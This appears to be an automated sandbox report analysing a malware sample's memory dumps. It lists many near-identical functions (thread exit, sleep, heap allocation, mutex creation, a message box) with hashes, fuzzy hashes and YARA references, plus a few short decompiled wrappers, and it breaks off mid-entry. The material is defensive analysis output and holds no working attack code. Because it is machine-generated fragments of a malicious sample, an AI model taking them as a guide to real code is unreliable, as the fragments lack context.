                                    • Opcode ID: 1507f16d1c8060c37e29c217a3c29be13e96fd5195aa6ed9a79a539f112e1d2e
                                    • Instruction ID: 62c2dd8a1114009e231d768c8528c853446194cf75c085bddc670beb0fccaca3
                                    • Opcode Fuzzy Hash: 1507f16d1c8060c37e29c217a3c29be13e96fd5195aa6ed9a79a539f112e1d2e
                                    • Instruction Fuzzy Hash: C7E06D71A002108FDB00DE5CC8C0B4A33D8AB48654F040661EC59CF34BD370DA9087D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04F00000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04F00023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621084536.0000000004F00000.00000040.00000001.sdmp, Offset: 04F00000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05180000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05180023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622171050.0000000005180000.00000040.00000001.sdmp, Offset: 05180000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D90000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 00D90023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.604102341.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04FA0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04FA0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621553945.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 053D0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 053D0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622813556.00000000053D0000.00000040.00000001.sdmp, Offset: 053D0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 059E0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 059E0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623915822.00000000059E0000.00000040.00000001.sdmp, Offset: 059E0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05880000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05880023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623634608.0000000005880000.00000040.00000001.sdmp, Offset: 05880000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 055B0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 055B0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623164978.00000000055B0000.00000040.00000001.sdmp, Offset: 055B0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 054C0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 054C0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623004205.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04DD0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04DD0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620501708.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 056A0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 056A0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623303576.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04E80000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04E80023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620727344.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00DD0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 00DD0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.604193675.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 052E0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 052E0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622543503.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00E10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 00E10023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.604260855.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05270000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05270023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622428642.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05970000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05970023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623822523.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04E10000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04E10023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620573287.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05790000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05790023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623471422.0000000005790000.00000040.00000001.sdmp, Offset: 05790000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24054CAC, Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24054CAC() {
				signed int* _t1;
				intOrPtr* _t4;
				CHAR* _t6;
				intOrPtr* _t7;
				int _t10;
				signed int* _t11;

				_t1 =  *0x2405ab54; // 0x2405b90c
				_t11 =  *0x2405ab90; // 0x2405b908
				_t4 =  *0x2405ac3c; // 0x2405b910
				_t6 = E24013534( *_t4);
				_t7 =  *0x2405ab68; // 0x2405b914
				_t10 = MessageBoxA(0, E24013534( *_t7), _t6,  *_t1 |  *_t11); // executed
				return _t10;
			}









                                    0x24054cac
                                    0x24054cb3
                                    0x24054cbc
                                    0x24054cc3
                                    0x24054cc9
                                    0x24054cd8
                                    0x24054cdd

                                    APIs
                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 24054CD8
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message
                                    • String ID:
                                    • API String ID: 2030045667-0
                                    • Opcode ID: 62e5b82c9f29b78443a84abf5618615f3ffde32acd6ae153d8b7b04fa9adcc3c
                                    • Instruction ID: 702cc106f4a7a2d6b1be419345dde670dc88a8b9112f57552fe3deaaf6047337
                                    • Opcode Fuzzy Hash: 62e5b82c9f29b78443a84abf5618615f3ffde32acd6ae153d8b7b04fa9adcc3c
                                    • Instruction Fuzzy Hash: 0FE067B82011009FF740EF5DC481E09B7EDFB59708B4040A0F509EB325CA78AC888F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24014F18, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E24014F18(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x24014f1b
                                    0x24014f23
                                    0x24014f2e
                                    0x24014f34

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,24038D32,00000000,00000000,00000000,00000000,?,00001388,?,24038DFC,?,24038DFC,?), ref: 24014F2E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: 23451572b9ac7c365ee53129fe26a2961a8c962687dd330d58eed9a717d1f506
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: B6C01273150248AF8700DEA8DC05D9B33DC5728509B008814B518C7104C139E5909B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401132C, Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2401132C(void* __eax, long __edx) {
				signed int _t2;
				void* _t4;
				void* _t5;

				_t2 =  *0x2405704c; // 0x0
				_t4 =  *0x2405b59c; // 0x3380000
				_t5 = RtlReAllocateHeap(_t4, _t2 & 0x00000000, __eax, __edx); // executed
				return _t5;
			}






                                    0x2401132e
                                    0x24011337
                                    0x2401133d
                                    0x24011342

                                    APIs
                                    • RtlReAllocateHeap.NTDLL(03380000,00000000), ref: 2401133D
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 4abe95f850d0d9200a44e547964a90c3e9cda96214ae224148f1167abf786759
                                    • Instruction ID: 3014dd12e75080097e17028eb6ae9be0359eb0967bd29ed8e842effb3de79cbc
                                    • Opcode Fuzzy Hash: 4abe95f850d0d9200a44e547964a90c3e9cda96214ae224148f1167abf786759
                                    • Instruction Fuzzy Hash: 35B092F2110600EEEB59DB9CCC41F1322EDF38C304F8090207108E7101C12DB8808B38
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240112F2, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(03380000,00000000), ref: 24011301
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 7161d32636c3c86d8838c9eab8894fe46237a95b5438a71f7e44a0cee6f9a405
                                    • Instruction ID: a048f9ad4230f0fa17450c3c1741978905e5392653df85ea27266bc0273e2366
                                    • Opcode Fuzzy Hash: 7161d32636c3c86d8838c9eab8894fe46237a95b5438a71f7e44a0cee6f9a405
                                    • Instruction Fuzzy Hash: DFB002A5610500EF9B95EFACCC44F2662EDF79D2547805560B608D7245D52DAC809B21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240112F4, Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(03380000,00000000), ref: 24011301
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: b407bbee38ace09f39b99b1c90f003e113612ee676480262dca8026249e0784f
                                    • Instruction ID: 5d6a148b29aed9c92f876fc96f070a3fb74a217887bb67d1e9c0f1fe2844cb5b
                                    • Opcode Fuzzy Hash: b407bbee38ace09f39b99b1c90f003e113612ee676480262dca8026249e0784f
                                    • Instruction Fuzzy Hash: 07B002A5510500DA9A95EF9CC844F1662EDF79D2547805550B208D7245C52DA8809B21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05480000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 05480026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622960310.0000000005480000.00000040.00000001.sdmp, Offset: 05480000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: b8d3c833eb8a0df8985675654c6a98f2dea0f6e466488346a01fc5083a12c31e
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: C4E00A74D04608EFCB04DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 056D0000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 056D0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623337384.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: e67c8e9db4b672b29217280454e72ba266b5c62ec969a0ac72a6ffa0c87c8daf
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 00E09A74D00608EFCB04CF99C44888DFBB5AF48320F20C291E825973A5D7309E41DA40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CD0000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 00CD0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.603661604.0000000000CD0000.00000040.00000001.sdmp, Offset: 00CD0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 14e0cf5fc89cc668bb7152b6a8e276f69238124deedeb21018dec0e9765ca0bb
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 86E09A74D00608EFCB04CF99C44898DBBB5AF48320F20C291E825973A5D730AE419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 055E0000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 055E0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623199637.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 1c0f57349416764f38f1c2c9f4adfdc46b41274df4e991acfcaa483f6baa28a6
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
